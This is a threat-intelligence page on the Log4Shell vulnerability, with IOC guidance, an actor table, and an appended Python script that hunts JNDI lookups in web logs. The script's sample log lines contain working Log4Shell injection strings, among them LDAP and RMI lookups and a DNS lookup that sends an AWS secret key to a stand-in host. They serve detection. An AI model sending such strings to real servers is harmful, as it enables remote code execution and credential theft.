Members of the Curated Intelligence Trust Group have compiled a list of IOC feeds and threat reports focused on the recent Log4Shell exploit targeting CVE-2021-44228 in Log4j.

- 2021-12-13
  - IOCs shared by these feeds are **LOW-TO-MEDIUM CONFIDENCE**; we strongly recommend **NOT** adding them to a blocklist. They could potentially be used for **THREAT HUNTING** and could be added to a **WATCHLIST**.
  - Curated Intel members at various organisations recommend focusing on **POST-EXPLOITATION ACTIVITY** by threats leveraging Log4Shell (e.g. threat actors, botnets). IOCs include JNDI requests (LDAP, but also DNS and RMI), cryptominers, DDoS bots, as well as Meterpreter or Cobalt Strike.
  - Critical IOCs to monitor also include attacks using DNS-based exfiltration of environment variables (e.g. keys or tokens).
- 2021-12-14
  - Curated Intel members profiled active exploitation threats.
- 2021-12-15
  - Curated Intel members parsed **MEDIUM CONFIDENCE FEEDS** to be **MISP COMPATIBLE** using KPMG's MISP implementation.
  - Curated Intel members profiled active threat groups (nation states and organized crime).
- 2021-12-16
  - Curated Intel members confirmed the previously unnamed "New Ransomware" is actually "TellYouThePass Ransomware", mostly targeting Chinese infrastructure.
Grouping | Actor | Mentioned Alias | Other Alias (EternalLiberty.csv) | Threat Report | Note |
---|---|---|---|---|---|
Nation State | China | HAFNIUM | N/A | MSTIC (2) | Attacking infrastructure to extend their typical targeting. In these attacks, HAFNIUM-associated systems were observed using a DNS service typically associated with testing activity to fingerprint systems. |
Organized Crime | Iran | PHOSPHORUS | APT35, TEMP.Beanie, TA 453, NewsBeef, CharmingKitten, G0003, CobaltIllusion, TG-2889, Timberworm, C-Major, Group 41, Tarh Andishan, Magic Hound, Newscaster | MSTIC (2) | Iranian actor that has been deploying ransomware, acquiring and making modifications of the Log4j exploit. |
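As an added example (not part of this list or of any Curated Intel feed), a small Python hunting helper for the 2021-12-13 notes above: it pulls `${jndi:...}` lookups out of constructed web access-log lines, labels the scheme (LDAP, DNS, RMI), and flags lookups that embed `${env:...}`, the environment-variable exfiltration pattern. The log lines, hosts and regexes are assumptions made for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the page or any feed): line 1 is
# benign, line 2 an LDAP lookup in the User-Agent, line 3 a URL-encoded DNS lookup
# embedding ${env:...} (the env-var exfiltration pattern), line 4 an RMI lookup.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.6 - - [13/Dec/2021:10:01:09 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://203.0.113.10:1389/a}"
10.0.0.7 - - [13/Dec/2021:10:02:31 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2F%24%7Benv%3AAWS_SECRET_ACCESS_KEY%7D.example.invalid%7D HTTP/1.1" 200 88 "-" "curl/7.79"
10.0.0.8 - - [13/Dec/2021:10:03:00 +0000] "POST /api HTTP/1.1" 500 0 "-" "${jndi:rmi://198.51.100.7:1099/x}"
"""

JNDI_START = re.compile(r"\$\{jndi:", re.IGNORECASE)
SCHEME = re.compile(r"^\$\{jndi:([a-z]+):", re.IGNORECASE)
ENV_REF = re.compile(r"\$\{env:", re.IGNORECASE)

def extract_jndi_lookups(text: str) -> list[str]:
    """Return every ${jndi:...} lookup in text, keeping nested ${...} intact."""
    text = unquote(text)  # payloads in access logs are often URL-encoded
    found = []
    for m in JNDI_START.finditer(text):
        depth, i = 0, m.start()
        while i < len(text):  # walk forward until the opening ${ is balanced
            if text.startswith("${", i):
                depth, i = depth + 1, i + 2
                continue
            if text[i] == "}":
                depth -= 1
                if depth == 0:
                    break
            i += 1
        found.append(text[m.start():i + 1])  # unbalanced lookup runs to end of line
    return found

def classify(lookup: str) -> dict:
    """Label the scheme (ldap/dns/rmi/...) and flag embedded ${env:...} references."""
    m = SCHEME.match(lookup)
    return {"lookup": lookup, "scheme": m.group(1).lower() if m else "unknown",
            "env_exfil": bool(ENV_REF.search(lookup))}

def hunt(log_text: str) -> list[dict]:
    """One finding per JNDI lookup, tagged with the log line number and client IP."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        for lookup in extract_jndi_lookups(line):
            findings.append({"line": lineno, "client": line.split(" ", 1)[0], **classify(lookup)})
    return findings
```

`hunt(SAMPLE_LOG)` returns three findings (lines 2 to 4), with only the DNS lookup marked `env_exfil`; it matches the plain `${jndi:` form after URL-decoding, so treat hits as watchlist items to investigate, in line with the note above, not as a blocklist.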